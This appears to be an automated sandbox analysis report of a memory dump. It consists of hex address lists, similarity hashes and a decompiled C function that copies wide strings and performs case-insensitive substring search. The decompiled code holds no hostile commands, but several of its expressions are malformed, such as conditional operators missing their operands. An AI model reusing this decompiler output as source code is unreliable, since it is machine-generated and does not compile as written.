0x008b8d68
0x008b8d6a
0x008b8d6c
0x008b8d72
0x008b8d7c
0x008b8d7c
0x008b8d7f
0x008b8d80
0x008b8d83
0x008b8d85
0x00000000
0x00000000
0x008b8d87
0x008b8d89
0x008b920b
0x00000000
0x00000000
0x00000000
0x00000000
0x008b8d8f
0x008b8d8f
0x008b8d91
0x008b8d76
0x008b8d79
0x008b8d79
0x00000000
0x008b8d79
0x00000000
0x008b8d91
0x008b8d7c
0x008b8d6c
0x008b907e
0x008b9082
0x008b9084
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b9084
0x008b9078
0x008b8f2b
0x008b8f1b
0x008b8f17
0x008b8c1c
0x008b8c1c
0x008b8c1c
0x008b8c20
0x00000000
0x008b8c20
0x00000000
0x008b8c16
0x008b929a
0x008b929c
0x00000000
0x008b929c
0x00000000
0x008b8c24
0x008b8c24
0x008b8c25
0x008b8c25
0x00000000
0x008b8be4
0x008b8b19
0x008b8b12
0x008b8a8b
0x008b8df6
0x008b8df6
0x008b8df8
0x008b8df9
0x008b8e0a
0x008b8a04
0x008b8a04
0x008b8a07
0x008b8a09
0x008b8a0e
0x008b8a10
0x008b8a18
0x008b8a1a
0x008b8a20
0x008b8a24
0x008b8a5c
0x008b8a26
0x008b8a28
0x008b8a2a
0x008b8a2d
0x008b8a32
0x008b8a34
0x008b8a34
0x008b8a35
0x008b8a3a
0x008b8a41
0x00000000
0x00000000
0x008b8a43
0x008b8a47
0x008b8a4d
0x00000000
0x00000000
0x00000000
0x008b8a4d
0x008b8a34
0x008b8a32
0x008b8a4f
0x008b8a4f
0x008b8a51
0x008b8a52
0x008b8a57
0x008b8a57
0x008b8a5f
0x008b8a62
0x008b8a69
0x008b8a74
0x008b8a74
0x00000000

Strings

@, xrefs: 008B9229

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction ID: e4a4f4f28798cfa84a7b02ce62e4078c695dea88ab42f777fe5ada3aeffc65f2
Opcode Fuzzy Hash: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction Fuzzy Hash: F042E471A04716CBDB248F29C8912BA72E6FFD5350F298629E9A5CB391EF34CC41C791

Uniqueness

Uniqueness Score: -1.00%

Function 008AAE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008AAE80(intOrPtr* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __esi;
				signed short* _t229;
				unsigned int _t237;
				signed int _t238;
				signed short** _t243;
				signed short* _t244;
				signed short* _t248;
				signed int* _t250;
				signed int _t255;
				signed int _t259;
				signed int _t264;
				signed int _t268;
				signed int _t271;
				unsigned int _t277;
				signed int _t278;
				void* _t284;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed short* _t298;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed short* _t334;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr* _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t407;
				signed int _t408;
				signed short* _t411;
				signed int* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t452;
				signed int _t455;
				intOrPtr* _t458;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				unsigned int _t465;
				unsigned int _t466;
				signed int _t467;
				unsigned int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				void* _t481;

				_v64 = 0;
				_t458 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t441 = E008A1030();
				_t481 = (_t478 & 0xfffffff0) - 0x34 + 4;
				_t229 = _v64;
				if(_t229 == 0) {
					__eflags = 0;
					 *_t441 = 0;
				} else {
					if(_t441 != 0) {
						_t384 =  *_t229 & 0x0000ffff;
						 *_t441 = _t384;
						if(_t384 != 0) {
							while(1) {
								_t384 = 1;
								_t382 = _t229[1] & 0x0000ffff;
								 *(_t441 + 2) = _t382;
								if(_t382 == 0) {
									goto L6;
								}
								_t383 = _t229[2] & 0x0000ffff;
								 *(_t441 + 4) = _t383;
								if(_t383 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(2);
					_push(_t229);
					E008A10B0();
					_t481 = _t481 + 8;
				}
				_v60 = 0x40;
				_v64 = _t441;
				if((_a8 & 0x0000ffff) != 0) {
					__eflags = _t441;
					if(_t441 == 0) {
						_t349 = 0x40;
						_t316 = 0;
					} else {
						_t309 = _t441 & 0x0000000f;
						__eflags = _t309;
						if(_t309 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t346 =  ~( ~_t309 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t346;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t384;
								if(_t384 != 0) {
									break;
								}
								_t309 = _t309 + 8;
								__eflags = _t309 - _t346;
								if(_t309 < _t346) {
									continue;
								} else {
									__eflags = _t346 - 0x7fffffff;
									if(_t346 >= 0x7fffffff) {
										goto L22;
									} else {
										goto L20;
									}
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t316 = (_t346 >> 1) + _t309;
							goto L126;
						} else {
							_t346 = 0;
							__eflags = _t309 & 0x00000001;
							if((_t309 & 0x00000001) != 0) {
								while(1) {
									L20:
									__eflags =  *(_t441 + _t346 * 2) & 0x0000ffff;
									if(( *(_t441 + _t346 * 2) & 0x0000ffff) == 0) {
										goto L126;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - 0x7fffffff;
									if(_t346 < 0x7fffffff) {
										continue;
									} else {
										L22:
										_t349 = 0x40;
										_t316 = 0x7fffffff;
									}
									goto L23;
								}
								goto L126;
							} else {
								_t309 =  ~_t309 + 0x10 >> 1;
								__eflags = _t309;
								while(1) {
									_t384 =  *(_t441 + _t346 * 2) & 0x0000ffff;
									__eflags = _t384;
									if(_t384 == 0) {
										break;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - _t309;
									if(_t346 < _t309) {
										continue;
									} else {
										goto L16;
									}
									goto L23;
								}
								L126:
								__eflags = _t316 - 0xfffffffe;
								if(_t316 != 0xfffffffe) {
									_t349 = 0x40;
								} else {
									 *_t441 = 0;
									_t349 = _v60;
								}
							}
						}
					}
					L23:
					_t24 = _t316 + 2; // -2147483652
					_t385 = _t24;
					__eflags = _t385 - 0x40;
					_t386 =  <=  ? 0x40 : _t385;
					__eflags = _t349 - _t386;
					if(_t349 < _t386) {
						_t237 = (_t386 >> 5 >> 0x1a) + _t386 >> 6;
						_t387 = _t386 & 0x8000003f;
						__eflags = _t387;
						if(_t387 < 0) {
							_t387 = (_t387 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t387;
						}
						__eflags = _t387;
						_t238 = _t237 + (0 | _t387 > 0x00000000);
						_push(_t238 << 7);
						_t443 = _t238 << 6;
						_t390 = E008A1030();
						_t481 = _t481 + 4;
						_t350 = _v64;
						__eflags = _t350;
						if(_t350 == 0) {
							__eflags = 0;
							 *_t390 = 0;
						} else {
							__eflags = _t390;
							if(_t390 != 0) {
								_t306 =  *_t350 & 0x0000ffff;
								 *_t390 = _t306;
								__eflags = _t306;
								if(_t306 != 0) {
									_v68 = _t458;
									_t307 = 0;
									__eflags = 0;
									while(1) {
										_t307 = _t307 + 1;
										_t476 =  *(_t350 + _t307 * 4 - 2) & 0x0000ffff;
										 *(_t390 + _t307 * 4 - 2) = _t476;
										__eflags = _t476;
										if(_t476 == 0) {
											break;
										}
										_t477 =  *(_t350 + _t307 * 4) & 0x0000ffff;
										 *(_t390 + _t307 * 4) = _t477;
										__eflags = _t477;
										if(_t477 != 0) {
											continue;
										}
										break;
									}
									_t458 = _v68;
								}
							}
							_push(2);
							_push(_t350);
							_v68 = _t390;
							E008A10B0();
							_t390 = _v68;
							_t481 = _t481 + 8;
						}
						_v60 = _t443;
						_v64 = _t390;
					} else {
						_t390 = _v64;
					}
					 *((short*)(_t390 + _t316 * 2)) = _a8 & 0x0000ffff;
					__eflags = 0;
					_t243 =  &_v64;
					 *((short*)(_v64 + 2 + _t316 * 2)) = 0;
				} else {
					_t243 =  &_v64;
				}
				_t244 =  *_t243;
				_v28 = _t244;
				if(_t244 == 0) {
					L40:
					_t392 = _a4;
					_push(0x80);
					 *_t392 = 0;
					 *((intOrPtr*)(_t392 + 4)) = 0;
					_t317 = E008A1030();
					_t481 = _t481 + 4;
					_t248 =  *_a4;
					if(_t248 == 0) {
						 *_t317 = 0;
					} else {
						if(_t317 != 0) {
							_t393 =  *_t248 & 0x0000ffff;
							 *_t317 = _t393;
							if(_t393 != 0) {
								_t394 = 0;
								while(1) {
									_t394 = _t394 + 1;
									_t352 =  *(_t248 + _t394 * 4 - 2) & 0x0000ffff;
									 *(_t317 + _t394 * 4 - 2) = _t352;
									if(_t352 == 0) {
										goto L46;
									}
									_t353 =  *(_t248 + _t394 * 4) & 0x0000ffff;
									 *(_t317 + _t394 * 4) = _t353;
									if(_t353 != 0) {
										continue;
									}
									goto L46;
								}
							}
						}
						L46:
						_push(2);
						_push(_t248);
						E008A10B0();
						_t481 = _t481 + 8;
					}
					goto L124;
				} else {
					_t319 =  *_t244 & 0x0000ffff;
					if(_t319 != 0) {
						_t460 =  *_t458;
						_t255 = E008AFB60(_t460, _t244, _t460);
						__eflags = _t255;
						if(_t255 == 0) {
							_t396 = _a4;
							_push(0x80);
							 *_t396 = 0;
							 *((intOrPtr*)(_t396 + 4)) = 0;
							_t317 = E008A1030();
							_t481 = _t481 + 4;
							_t259 =  *_a4;
							__eflags = _t259;
							if(_t259 == 0) {
								 *_t317 = 0;
							} else {
								__eflags = _t317;
								if(_t317 != 0) {
									_t397 =  *_t259 & 0x0000ffff;
									 *_t317 = _t397;
									__eflags = _t397;
									if(_t397 != 0) {
										_t398 = 0;
										__eflags = 0;
										while(1) {
											_t398 = _t398 + 1;
											_t355 =  *(_t259 + _t398 * 4 - 2) & 0x0000ffff;
											 *(_t317 + _t398 * 4 - 2) = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												goto L176;
											}
											_t356 =  *(_t259 + _t398 * 4) & 0x0000ffff;
											 *(_t317 + _t398 * 4) = _t356;
											__eflags = _t356;
											if(_t356 != 0) {
												continue;
											}
											goto L176;
										}
									}
								}
								L176:
								_push(2);
								_push(_t259);
								E008A10B0();
								_t481 = _t481 + 8;
							}
							goto L124;
						} else {
							_t66 = _t319 - 0x41; // 0x7fffffbe
							__eflags = _t66 - 0x19;
							_t67 = _t319 + 0x20; // 0x8000001f
							_v40 = _t460;
							_t320 =  <=  ? _t67 : _t319;
							_t400 = _v28 & 0x0000000f;
							_t358 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							asm("pxor xmm0, xmm0");
							_v36 =  ~_t400 + 0x10 >> 1;
							_v32 = _t400 & 0x00000001;
							_t448 = 0;
							__eflags = 0;
							_v44 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							while(1) {
								L50:
								_t325 = _t255;
								_t462 = _t255 + 2;
								__eflags = _t462;
								if(_t462 == 0) {
									break;
								}
								__eflags =  *(_t255 + 2) & 0x0000ffff;
								if(( *(_t255 + 2) & 0x0000ffff) == 0) {
									break;
								} else {
									_v52 = _t400;
									_t368 = _t448;
									_v68 = _t325;
									while(1) {
										_t368 = _t368 + 1;
										_t334 = _t255 + _t368 * 2;
										_t429 =  *_t334 & 0x0000ffff;
										__eflags = ( *(_t462 + _t368 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
										_v48 = _t334;
										_t448 = _v44;
										_t430 =  <=  ? _t429 + 0x20 : _t429;
										__eflags = ( <=  ? _t429 + 0x20 : _t429) - _t448;
										if(( <=  ? _t429 + 0x20 : _t429) == _t448) {
											break;
										}
										__eflags =  *(_t462 + _t368 * 2) & 0x0000ffff;
										if(( *(_t462 + _t368 * 2) & 0x0000ffff) != 0) {
											continue;
										} else {
											L55:
											_t325 = _v68;
											_t463 = _v40;
										}
										goto L56;
									}
									_t400 = _v52;
									_t301 = _v48;
									_t452 = _v36;
									_t465 = _v32;
									while(1) {
										_t336 = _t400;
										__eflags = _t400;
										if(_t400 == 0) {
											goto L141;
										}
										L136:
										_t377 = 0;
										__eflags = _t465;
										if(_t465 != 0) {
											L145:
											_v32 = _t465;
											_t474 = _v28;
											while(1) {
												__eflags =  *(_t474 + _t377 * 2) & 0x0000ffff;
												if(( *(_t474 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - 0x7fffffff;
												if(_t377 < 0x7fffffff) {
													continue;
												} else {
													_t466 = _v32;
													goto L149;
												}
												goto L180;
											}
											_t466 = _v32;
											goto L159;
										} else {
											_v32 = _t465;
											_t336 = _t452;
											_v24 = _t301;
											_t475 = _v28;
											while(1) {
												__eflags =  *(_t475 + _t377 * 2) & 0x0000ffff;
												if(( *(_t475 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - _t452;
												if(_t377 < _t452) {
													continue;
												} else {
													_t301 = _v24;
													_t465 = _v32;
													goto L141;
												}
												goto L180;
											}
											_t301 = _v24;
											_t466 = _v32;
											L159:
											__eflags = _t377;
											if(__eflags == 0) {
												L149:
												_t377 = 0x7fffffff;
												goto L150;
											} else {
												if(__eflags > 0) {
													L150:
													_v56 = _t377;
													_t337 = 0;
													__eflags = 0;
													_v52 = _t400;
													_v36 = _t452;
													_v32 = _t466;
													while(1) {
														_t467 =  *(_t301 + _t337 * 2) & 0x0000ffff;
														_t455 =  *(_v28 + _t337 * 2) & 0x0000ffff;
														__eflags = _t467 - 0x61 - 0x19;
														_t468 =  <=  ? _t467 - 0x20 : _t467;
														_t432 = ( <=  ? _t467 - 0x20 : _t467) & 0x0000ffff;
														__eflags = _t455 - 0x61 - 0x19;
														_t456 =  <=  ? _t455 - 0x20 : _t455;
														__eflags = _t432 - ( <=  ? _t455 - 0x20 : _t455);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t432;
														if(_t432 == 0) {
															L155:
															_t400 = _v52;
															_t448 = 0;
															__eflags = 0;
															_t325 = _v68;
															goto L156;
														} else {
															_t337 = _t337 + 1;
															__eflags = _t337 - _v56;
															if(_t337 < _v56) {
																continue;
															} else {
																goto L155;
															}
														}
														goto L180;
													}
													_t433 = _v52;
													_t448 = _v36;
													_t470 = _v32;
													_t339 = _t301 + 2;
													__eflags = _t339;
													if(_t339 == 0) {
														goto L55;
													} else {
														__eflags =  *(_t301 + 2) & 0x0000ffff;
														if(( *(_t301 + 2) & 0x0000ffff) == 0) {
															goto L55;
														} else {
															_v52 = _t433;
															_t381 = 0;
															__eflags = 0;
															_v24 = _t301;
															_v36 = _t448;
															_v32 = _t470;
															while(1) {
																_t381 = _t381 + 1;
																_t301 = _v24 + _t381 * 2;
																_t434 =  *_t301 & 0x0000ffff;
																__eflags = ( *(_t339 + _t381 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																_t448 = _t434 + 0x20;
																_t435 =  <=  ? _t448 : _t434;
																__eflags = ( <=  ? _t448 : _t434) - _v44;
																if(( <=  ? _t448 : _t434) == _v44) {
																	break;
																}
																__eflags =  *(_t339 + _t381 * 2) & 0x0000ffff;
																if(( *(_t339 + _t381 * 2) & 0x0000ffff) != 0) {
																	continue;
																} else {
																	goto L55;
																}
																goto L180;
															}
															_t400 = _v52;
															_t452 = _v36;
															_t465 = _v32;
															_t336 = _t400;
															__eflags = _t400;
															if(_t400 == 0) {
																goto L141;
															}
														}
													}
												} else {
													_v36 = _t452;
													_t448 = 0;
													_v32 = _t466;
													_t325 = _v68;
													L156:
													__eflags = _t301;
													if(_t301 != 0) {
														goto L50;
													} else {
														goto L157;
													}
												}
											}
										}
										L180:
										L141:
										_v36 = _t452;
										_t374 =  ~( ~_t336 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t374;
										_v32 = _t465;
										while(1) {
											asm("movdqu xmm1, [edi+ebx*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb esi, xmm1");
											__eflags = _t465;
											if(_t465 != 0) {
												break;
											}
											_t336 = _t336 + 8;
											__eflags = _t336 - _t374;
											if(_t336 < _t374) {
												continue;
											} else {
												_t452 = _v36;
												_t466 = _v32;
												__eflags = _t374 - 0x7fffffff;
												if(_t374 >= 0x7fffffff) {
													goto L149;
												} else {
													goto L145;
												}
											}
											goto L180;
										}
										asm("bsf ecx, ecx");
										_t452 = _v36;
										_t377 = (_t465 >> 1) + _t336;
										_t466 = _v32;
										goto L159;
									}
								}
								L56:
								_t326 = _t325 - _t463;
								__eflags = _t326;
								_t327 = _t326 >> 1;
								if(_t326 != 0) {
									__eflags = _t463;
									if(_t463 == 0) {
										_t401 = 0;
									} else {
										_t291 = _t463 & 0x0000000f;
										__eflags = _t291;
										if(_t291 == 0) {
											L71:
											_t401 =  ~( ~_t291 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t401;
											while(1) {
												asm("movdqu xmm1, [esi+eax*2]");
												asm("pcmpeqw xmm1, xmm0");
												asm("pmovmskb edi, xmm1");
												__eflags = _t448;
												if(_t448 != 0) {
													break;
												}
												_t291 = _t291 + 8;
												__eflags = _t291 - _t401;
												if(_t291 < _t401) {
													continue;
												} else {
													__eflags = _t401 - 0x7fffffff;
													if(_t401 >= 0x7fffffff) {
														goto L77;
													} else {
														goto L75;
													}
												}
												goto L78;
											}
											asm("bsf edx, edi");
											_t401 = (_t401 >> 1) + _t291;
										} else {
											_t401 = 0;
											__eflags = _t291 & 0x00000001;
											if((_t291 & 0x00000001) != 0) {
												while(1) {
													L75:
													__eflags =  *(_t463 + _t401 * 2) & 0x0000ffff;
													if(( *(_t463 + _t401 * 2) & 0x0000ffff) == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - 0x7fffffff;
													if(_t401 < 0x7fffffff) {
														continue;
													} else {
														L77:
														_t401 = 0x7fffffff;
													}
													goto L78;
												}
											} else {
												_t291 =  ~_t291 + 0x10 >> 1;
												__eflags = _t291;
												while(1) {
													_t448 =  *(_t463 + _t401 * 2) & 0x0000ffff;
													__eflags = _t448;
													if(_t448 == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - _t291;
													if(_t401 < _t291) {
														continue;
													} else {
														goto L71;
													}
													goto L78;
												}
											}
										}
									}
									L78:
									_t264 = _t401 >> 0x0000001f & _t401;
									_t402 = _t401 - _t264;
									__eflags = _t327;
									if(_t327 < 0) {
										L80:
										_t327 = _t402;
									} else {
										__eflags = _t327 - _t402;
										if(_t327 > _t402) {
											goto L80;
										}
									}
									_t403 = _a4;
									_t449 = _t463 + _t264 * 2;
									 *_t403 = 0;
									 *((intOrPtr*)(_t403 + 4)) = 0;
									__eflags = _t449;
									if(_t449 == 0) {
										L116:
										_push(0x80);
										_t317 = E008A1030();
										_t481 = _t481 + 4;
										_t268 =  *_a4;
										__eflags = _t268;
										if(_t268 == 0) {
											__eflags = 0;
											 *_t317 = 0;
										} else {
											__eflags = _t317;
											if(_t317 != 0) {
												_t404 =  *_t268 & 0x0000ffff;
												 *_t317 = _t404;
												__eflags = _t404;
												if(_t404 != 0) {
													_t405 = 0;
													__eflags = 0;
													while(1) {
														_t405 = _t405 + 1;
														_t359 =  *(_t268 + _t405 * 4 - 2) & 0x0000ffff;
														 *(_t317 + _t405 * 4 - 2) = _t359;
														__eflags = _t359;
														if(_t359 == 0) {
															goto L122;
														}
														_t360 =  *(_t268 + _t405 * 4) & 0x0000ffff;
														 *(_t317 + _t405 * 4) = _t360;
														__eflags = _t360;
														if(_t360 != 0) {
															continue;
														}
														goto L122;
													}
												}
											}
											L122:
											_push(2);
											_push(_t268);
											E008A10B0();
											_t481 = _t481 + 8;
										}
										goto L124;
									} else {
										_t271 =  *_t449 & 0x0000ffff;
										__eflags = _t271;
										if(_t271 == 0) {
											goto L116;
										} else {
											__eflags = _t327;
											if(_t327 == 0) {
												_t417 = _t449 & 0x0000000f;
												__eflags = _t417;
												if(_t417 == 0) {
													L89:
													_t327 =  ~( ~_t417 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t327;
													while(1) {
														asm("movdqu xmm1, [edi+edx*2]");
														asm("pcmpeqw xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t271;
														if(_t271 != 0) {
															break;
														}
														_t417 = _t417 + 8;
														__eflags = _t417 - _t327;
														if(_t417 < _t327) {
															continue;
														} else {
															__eflags = _t327 - 0x7fffffff;
															if(_t327 >= 0x7fffffff) {
																goto L95;
															} else {
																goto L93;
															}
														}
														goto L96;
													}
													asm("bsf ebx, eax");
													_t327 = (_t327 >> 1) + _t417;
												} else {
													_t327 = 0;
													__eflags = _t417 & 0x00000001;
													if((_t417 & 0x00000001) != 0) {
														while(1) {
															L93:
															__eflags =  *(_t449 + _t327 * 2) & 0x0000ffff;
															if(( *(_t449 + _t327 * 2) & 0x0000ffff) == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - 0x7fffffff;
															if(_t327 < 0x7fffffff) {
																continue;
															} else {
																L95:
																_t327 = 0x7fffffff;
															}
															goto L96;
														}
													} else {
														_t417 =  ~_t417 + 0x10 >> 1;
														__eflags = _t417;
														while(1) {
															_t271 =  *(_t449 + _t327 * 2) & 0x0000ffff;
															__eflags = _t271;
															if(_t271 == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - _t417;
															if(_t327 < _t417) {
																continue;
															} else {
																goto L89;
															}
															goto L96;
														}
													}
												}
											}
											L96:
											_t114 = _t327 + 1; // 0x80000000
											_t406 = _t114;
											__eflags = _t406 - 0x40;
											_t407 =  <=  ? 0x40 : _t406;
											__eflags = _t407;
											if(_t407 > 0) {
												_t277 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
												_t408 = _t407 & 0x8000003f;
												__eflags = _t408;
												if(_t408 < 0) {
													_t408 = (_t408 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t408;
												}
												__eflags = _t408;
												_t278 = _t277 + (0 | _t408 > 0x00000000);
												_v68 = _t278 << 6;
												_push(_t278 << 7);
												_t464 = E008A1030();
												_t481 = _t481 + 4;
												_t411 =  *_a4;
												__eflags = _t411;
												if(_t411 == 0) {
													__eflags = 0;
													 *_t464 = 0;
												} else {
													__eflags = _t464;
													if(_t464 != 0) {
														_t287 =  *_t411 & 0x0000ffff;
														 *_t464 = _t287;
														__eflags = _t287;
														if(_t287 != 0) {
															_t288 = 0;
															__eflags = 0;
															while(1) {
																_t288 = _t288 + 1;
																_t363 =  *(_t411 + _t288 * 4 - 2) & 0x0000ffff;
																 *(_t464 + _t288 * 4 - 2) = _t363;
																__eflags = _t363;
																if(_t363 == 0) {
																	goto L106;
																}
																_t364 =  *(_t411 + _t288 * 4) & 0x0000ffff;
																 *(_t464 + _t288 * 4) = _t364;
																__eflags = _t364;
																if(_t364 != 0) {
																	continue;
																}
																goto L106;
															}
														}
													}
													L106:
													_push(2);
													_push(_t411);
													E008A10B0();
													_t481 = _t481 + 8;
												}
												_t412 = _a4;
												_t412[1] = _v68;
												 *_t412 = _t464;
											} else {
												_t464 = 0;
											}
											__eflags = _t464;
											if(_t464 != 0) {
												_t284 = 0;
												while(1) {
													_t413 =  *_t449 & 0x0000ffff;
													_t284 = _t284 + 1;
													 *_t464 = _t413;
													__eflags = _t327;
													if(_t327 == 0) {
														goto L114;
													}
													__eflags = _t284 - _t327;
													if(_t284 == _t327) {
														 *(_t464 + 2) = 0;
													} else {
														goto L114;
													}
													goto L125;
													L114:
													__eflags = _t413;
													if(_t413 != 0) {
														_t464 = _t464 + 2;
														_t449 = _t449 + 2;
														__eflags = _t449;
														continue;
													}
													goto L125;
												}
											}
										}
									}
								} else {
									_t426 = _a4;
									_push(0x80);
									 *_t426 = 0;
									 *((intOrPtr*)(_t426 + 4)) = 0;
									_t317 = E008A1030();
									_t481 = _t481 + 4;
									_t298 =  *_a4;
									__eflags = _t298;
									if(_t298 == 0) {
										 *_t317 = 0;
									} else {
										__eflags = _t317;
										if(_t317 != 0) {
											_t427 =  *_t298 & 0x0000ffff;
											 *_t317 = _t427;
											__eflags = _t427;
											if(_t427 != 0) {
												_t428 = 0;
												__eflags = 0;
												while(1) {
													_t428 = _t428 + 1;
													_t365 =  *(_t298 + _t428 * 4 - 2) & 0x0000ffff;
													 *(_t317 + _t428 * 4 - 2) = _t365;
													__eflags = _t365;
													if(_t365 == 0) {
														goto L63;
													}
													_t366 =  *(_t298 + _t428 * 4) & 0x0000ffff;
													 *(_t317 + _t428 * 4) = _t366;
													__eflags = _t366;
													if(_t366 != 0) {
														continue;
													}
													goto L63;
												}
											}
										}
										L63:
										_push(2);
										_push(_t298);
										E008A10B0();
										_t481 = _t481 + 8;
									}
									L124:
									_t250 = _a4;
									 *_t250 = _t317;
									_t250[1] = 0x40;
								}
								goto L125;
							}
							L157:
							_t463 = _v40;
							goto L56;
						}
					} else {
						goto L40;
					}
				}
				L125:
				_push(2);
				_push(_v64);
				E008A10B0();
				_v64 = 0;
				_v60 = 0;
				return _a4;
				goto L180;
			}

0x008aae8e
0x008aae92
0x008aae94
0x008aae98
0x008aaea2
0x008aaea4
0x008aaea7
0x008aaead
0x008aaee7
0x008aaee9
0x008aaeaf
0x008aaeb1
0x008aaeb3
0x008aaeb6
0x008aaebb
0x008aaebf
0x008aaebf
0x008aaec0
0x008aaec5
0x008aaecc
0x00000000
0x00000000
0x008aaece
0x008aaed2
0x008aaed8
0x00000000
0x00000000
0x00000000
0x008aaed8
0x008aaebf
0x008aaebb
0x008aaeda
0x008aaeda
0x008aaedc
0x008aaedd
0x008aaee2
0x008aaee2
0x008aaef0
0x008aaef8
0x008aaefe
0x008aaf09
0x008aaf0b
0x008ab6df
0x008ab6e4
0x008aaf11
0x008aaf13
0x008aaf13
0x008aaf16
0x008aaf36
0x008aaf3a
0x008aaf46
0x008aaf46
0x008aaf4c
0x008aaf4c
0x008aaf51
0x008aaf55
0x008aaf59
0x008aaf5b
0x00000000
0x00000000
0x008aaf61
0x008aaf64
0x008aaf66
0x00000000
0x008aaf68
0x008aaf68
0x008aaf6e
0x00000000
0x00000000
0x00000000
0x00000000
0x008aaf6e
0x00000000
0x008aaf66
0x008ab6d3
0x008ab6d8
0x00000000
0x008aaf18
0x008aaf18
0x008aaf1a
0x008aaf1c
0x008aaf70
0x008aaf70
0x008aaf74
0x008aaf76
0x00000000
0x00000000
0x008aaf7c
0x008aaf7d
0x008aaf83
0x00000000
0x008aaf85
0x008aaf85
0x008aaf85
0x008aaf8a
0x008aaf8a
0x00000000
0x008aaf83
0x00000000
0x008aaf1e
0x008aaf23
0x008aaf23
0x008aaf25
0x008aaf25
0x008aaf29
0x008aaf2b
0x00000000
0x00000000
0x008aaf31
0x008aaf32
0x008aaf34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008aaf34
0x008ab458
0x008ab458
0x008ab45b
0x008ab46b
0x008ab45d
0x008ab45f
0x008ab462
0x008ab462
0x008ab45b
0x008aaf1c
0x008aaf16
0x008aaf8f
0x008aaf94
0x008aaf94
0x008aaf97
0x008aaf9a
0x008aaf9d
0x008aaf9f
0x008aafb4
0x008aafb7
0x008aafb7
0x008aafbd
0x008aafc5
0x008aafc5
0x008aafc5
0x008aafc6
0x008aafd0
0x008aafd7
0x008aafd8
0x008aafe0
0x008aafe2
0x008aafe5
0x008aafe9
0x008aafeb
0x008ab033
0x008ab035
0x008aafed
0x008aafed
0x008aafef
0x008aaff1
0x008aaff4
0x008aaff7
0x008aaff9
0x008aaffb
0x008aaffe
0x008aaffe
0x008ab000
0x008ab000
0x008ab001
0x008ab006
0x008ab00b
0x008ab00d
0x00000000
0x00000000
0x008ab00f
0x008ab013
0x008ab017
0x008ab019
0x00000000
0x00000000
0x00000000
0x008ab019
0x008ab01b
0x008ab01b
0x008aaff9
0x008ab01e
0x008ab020
0x008ab021
0x008ab025
0x008ab02a
0x008ab02e
0x008ab02e
0x008ab038
0x008ab03c
0x008aafa1
0x008aafa1
0x008aafa1
0x008ab044
0x008ab048
0x008ab04e
0x008ab052
0x008aaf00
0x008aaf00
0x008aaf00
0x008ab057
